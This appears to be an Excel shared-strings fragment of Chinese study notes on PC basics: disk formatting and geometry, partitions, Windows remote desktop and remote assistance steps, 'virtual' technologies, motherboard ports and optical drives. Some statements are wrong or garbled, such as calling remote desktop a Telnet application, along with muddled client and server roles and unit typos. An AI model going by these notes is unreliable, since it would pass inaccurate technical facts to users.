    <t>DOS下可能有分区识别问题。使用Format命令格式化不会自动修复逻辑坏道，如果发现有坏道，最好使用SCANDISK或WINDOWS系统的磁盘检查功能、还有其它第三方软件进行修复或隐藏，逻辑坏道既可以通过磁盘检查也可以通过低格解决，这取决于是扇区的哪个部分出现了错误。</t>
  </si>
  <si>
    <t>删除文件分配表；不检查扇区损坏情况；</t>
  </si>
  <si>
    <t>可以在DOS和操作系统上进行，只能对分区操作。快速格式化也只是存储数据</t>
  </si>
  <si>
    <t>DOS下可能有分区识别问题。另外，似乎Linux系统没有快速格式化命令。</t>
  </si>
  <si>
    <t>低级
格式化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>高级
格式化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快速
格式化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘的低级格式化：是将空白的磁盘划分出柱面和磁道，再将磁道划分为若干个扇区，每个扇区又划分出标识部分ID、间隔区GAP和数据区DATA等。可见，低级格式化是高级格式化之前的一件工作，它不仅能在DOS环境来完成，也能在xp甚至vista系统下完成。而且低级格式化只能针对一块硬盘而不能支持单独的某一个分区。每块硬盘在出厂时，已由硬盘生产商进行低级格式化，因此通常使用者无需再进行低级格式化操作。低级格式化是一种损耗性操作，其对硬盘寿命有一定的负面影响。经过低格后的硬盘，原来保护的数据将全部丢失，对于硬盘上出现逻辑坏道或者软性物理坏道，用户可以试试使用低级格式化来达到屏蔽坏道的作用，在很多计算机的BIOS ROM中存放着低格程序，存放地址从C8005H地址开始，具体操作如下：A：＼＞Debug ；低格工具：DM的全名是Hard Disk Management Program。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>低格、高格、快格的区别</t>
  </si>
  <si>
    <t>低格、高格、快格的区别</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘寻址模式：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 LBA Loigc Block Address：扇区的逻辑块地址；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 C/H/S模式：Cylinder/Head/Sector的三维寻址模式；磁头相当于盘片面，因为一个面对应一个磁头；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 电：主要是指半导体存储器，采用超大规模集成电路工艺制成存储芯片，每个芯片中包含相当数量的存储位元，有晶体管双极和场效应管型。优盘、数码卡（SM卡、多媒体卡、记忆棒、XD图像卡）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>c DPT（Disk Partition Table)分区表；64B；每个分区都有一个确定的起、止位置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b 引导程序（DOS引导程序）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OBR(OS Boot Record)操作系统引导区：位置：0磁道1柱面1扇区；由高级格式化程序产生；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    在磁盘片的每一个面上，以转动轴为轴心，以一定的磁密度为间隔的若干个同心圆就被划分为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>磁道Track（每片上万，由外向内从0开始编号）</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>,每个磁道又被划分成一段段的圆弧，每段圆弧叫一个</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>扇区sector（每个扇区通常为512B，从1开始编号）</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>,相邻的扇区组合在一起就成了一个</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>簇cluster</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（分区中只有数据区才得分为簇，其它区域只划分为扇区）,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>在每一面上都相应地有一个读写磁头head,不同磁头的所有相同位置的磁道就构成了所谓的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>柱面cylinder</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（所有盘面上的同一磁道，是各个盘面编号相同的磁道构成的整体，从外向内自0开始编号）；离主轴最远的是0磁道，盘片组2-14个，一个盘面300-1024个磁道；盘面由上而下从0开始编号，</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>数据的读写按柱面进行</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，因为选取碰头只需通过电子切换即可，而选取柱面则必须机械切换，所以数据的读写按柱面进行，而不是按盘面进行，一个柱面写满后，才移到下一个扇区开始读写数据，这样提高了硬盘的读写效率；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘的主分区又叫主DOS分区Primary DOS Partition,也称主磁盘分区；或称系统盘、母盘；一般也是C盘；
扩展分区又称为扩展DOS分区；
非DOS分区：是一种特殊的分区形式，它是将硬盘中的一块区域单独划分出来供另一个操作系统使用，如Linux;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>存储容量＝磁头数*柱面数（磁道数）*扇区数*每扇区字节数（512B）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>早期的一些工作站的配置都不是很高，相对来说服务器的配置要稍好，Telnet的出现，即是为了服务于工作站访问Server，让程序在Server上运行，然后再将结果返回到Client；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程桌面和远程协助都是Telnet的应用，主要用于远程管理和远程控制，是系统自带的远程控制工具；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程控制软件通常包含两个部分：运行在主控端的服务端程序Server和运行在被控端的clent客户端程序；木马就是一种 远程控制软件；反弹型木马是指服务端或被控端的木马主动与客户端通信（绕开防火墙）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程协助：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在远程协助过程中，我们将远程控制者称为主控端S，而接受者称为被控端C。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1 在桌面“</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>计算机</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>”图标上单击</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>右键</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，选择</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>属性</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>打开管理界面，单击左侧</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>高级系统设置</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，然后在弹出的系统属性窗口中选择</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>远程</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，即会弹出相应的设置页，勾选：允许远程协助连接这台计算机；（也可在控制面板的系统内设置）</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 C邀请S：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>开始---所有程序---维护---windows远程协助---邀请信任的人帮助你---通过windows mail发放邀请---生成邀请文件使用其他方式发放邀请给S---文件名、路径、密码---将保存好的邀请文件通过电子邮件、文件共享或其他方式，如QQ传送给S；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 S协助C：S双击收到的邀请文件，输入密码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 C确认同意被远程协助；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 即时聊天：点击远程协助桌面的“聊天”按钮；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 S申请控制C：S点击“申请控制”按钮，C确认后，S即可以控制C的桌面了；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>7 S点击“停止共享”按钮便可将控制权交回给C；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1 在桌面“</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>计算机</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>”图标上单击</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>右键</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，选择</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>属性</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>打开管理界面，单击左侧</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>高级系统设置</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，然后在弹出的系统属性窗口中选择</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>远程</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>，即会弹出相应的设置页，勾选：允许远程桌面连接这台计算机；（也可在控制面板的系统内设置）</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 S发起向C的远程桌面连接：附件---远程桌面连接---选项---常规---C的计算机名或IP地址---显示选项卡：设置远程桌面大小和颜色；---本地资源选项卡：详细信息：勾选驱动器，方便本地计算机与桌面之间进行文件复制和传输---连接---C的用户名和密码---确定；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 C上如果该用户已经登录，则其本地桌面将被注销；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 当不需要使用远程桌面时，在远程桌面中点击“开始---注销即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程桌面：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程控制：远程桌面和远程协助</t>
  </si>
  <si>
    <t>远程控制：远程桌面和远程协助</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟virtual</t>
  </si>
  <si>
    <t>虚拟virtual</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟内存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>又叫分页文件，pagefile,OS为提供比实际物理内存还多的内存供使用而占用硬盘上的空间；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟光驱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装完UltraISO后即可新增一个虚拟光驱，ISO文件即可通过此虚拟光驱进行加载、播放，就如同一台实际的光驱一样操作；另外，可通过ISO系统安装映像文件通过虚拟光驱进行系统安装；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟文件夹</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>搜索结果的保存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟打印机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在没有实际安装打印机的情形下查看打印效果；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟网卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>把安装的此软件识别成一块网卡，在远程的PC上组成一个LAN，可以相互访问，如联网玩游戏；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟桌面</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>将一台电脑的桌面虚拟成四个桌面，实现不同的桌面打开不同的程序，实现切换；相当于通过桌面实现打开的程序图标分组；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟社会</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 同步虚拟社会：网络联机游戏；b 异步虚拟社会：BBS（论坛）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟公司</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无具体的形态，但最终有产品提供给消费者：利用通信、流通技术；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟办公室</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>租用作为接待客户，且以该大楼地址为自己公司的固定联络地址，且此处的接待人员始终以你的身份与外部联络；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用虚拟机软件将一些硬件资源映射为自己的资源，安装自己的OS，可以成为网络中的一员，可以有多个用户；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟服务器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装服务器OS的虚拟机；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟主机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用特殊的软硬件技术，将一台运行在因特网上的服务器主机分为一台台虚拟的主机，每一台虚拟的主机都有独立的域名，具有完整的internet功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟LAN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VLAN：一个局域网的逻辑合并和虚拟分割，在交换局域网的基础上，采用网络管理软件构建的可跨越不同网段、不同网络、端到端的逻辑网络；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟专用网</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VPN：通过公用网络建立的一个安全的私有连接，在局域网的基础上，局域网外的客户机通过公用网络，虚拟专用网服务器来访问LAN。这个访问叫远程访问或远程登录；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟IP地址</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是指LAN的IP地址；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>存储介质：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>凡仅有两种稳定的物理状态，能方便地检测出属于哪种物理状态，两种物理状态又容易相互转换物质或元器件，都可以用来记录二进制代码0和1,称这样的物质或元器件为存储介质或记录介质：存储介质不同，存储的原理也不一样；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 是Adobe公司制定的一种特定格式的文档，这种文档能够实现如实保留原有文件的面貌和内容以字文件和图像；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 可以实现Unix\windows\Max系统的跨平台使用；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 方便网络舆</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 可以使用Adobe Acrobat来编辑或从其它格式的文档到PDF；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 可以使用acrobat Reader来阅读和打印PDF文档；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>PDF文档：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Portable Document Format可移植文档格式；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据总线宽度：又叫字长，是指一次或一个时间周期运行的数据位数，如32位技术；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>地址总线宽度：是反映CPU可使用多大容量的内存的一个指标，如32位，则    ＝4G，CPU最多可直接访问4G的物理内存，    ＝1G</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无线网卡：无线局域网卡，无线</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接内部局域网；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无线上网卡：无线internet网卡，通过电信移动基站连接internet，充当modem,内置SIM卡充当电话线，需要有手机信号覆盖；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NAT：Network Adress Translation:网络地址转换，即内部IP地址与Internet上的合法注册的外部IP地址的转换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARP：Address Resolution Protocal，地址解析协议，LAN内内网IP地址到MAC物理地址的解析，包含网关和LAN内部全部内网IP地址和物理地址的对应，即网卡的调整缓存，ARP命令确定内网IP地十与MAC的对应；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DNS:domain Name Service域名对应唯一的外网IP地址；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU风扇卡座</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU风扇电源插槽</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU插槽</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AGP或PCI-E接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PCI-E</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU电源插槽</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板电源接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SATA接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ATA1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ATA2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软盘接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>串口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>并口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>键盘PS/2接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>鼠标PS/2接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无线网卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>声道音箱接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IEEE 1394接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>USB接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BISO芯片\CMOS电池、无线网卡芯片、板载声卡芯片、SATA ARID控制芯片；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU风扇</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU风扇电源接头</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>声卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>音箱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>modem</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>市电</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>专用接头（正方形4孔）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>24针或20针接头</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">专用接头 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>D型接头（4孔）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>专用接头</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电源</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打印机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软驱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光驱</t>
  </si>
  <si>
    <t>光驱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ATA硬盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SATA硬盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光纤音频输出接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>键盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>鼠标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无线网卡接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>连接机箱面板按钮和指示灯的插针和USB插座</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>配件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 光驱类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 光驱性能指标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD刻录机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>COMBO光驱</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>普通DVD刻录机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>蓝光DVD刻录机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HD DVD刻录机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>只读CD光驱，只读VCD、CD；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>刻录CD——RW，读VCD、CD；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Combine DVE-ROM with CD-RW;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>单层可达4.7GB；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>单层可达23-27GB；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>单层可达15GB；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>接口类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>速度和读取方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>容错能力</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>缓存和格式支持</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>平均寻道时间</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD激光头系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是否钢制机芯；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD倍速：150DB/s，目前已达56X；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD倍速：1350KB/s，目前最大已达16X；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD-RAW</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD+RW</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD-Dual RW</t>
    <phoneticPr fontId="1" type="noConversion"/>
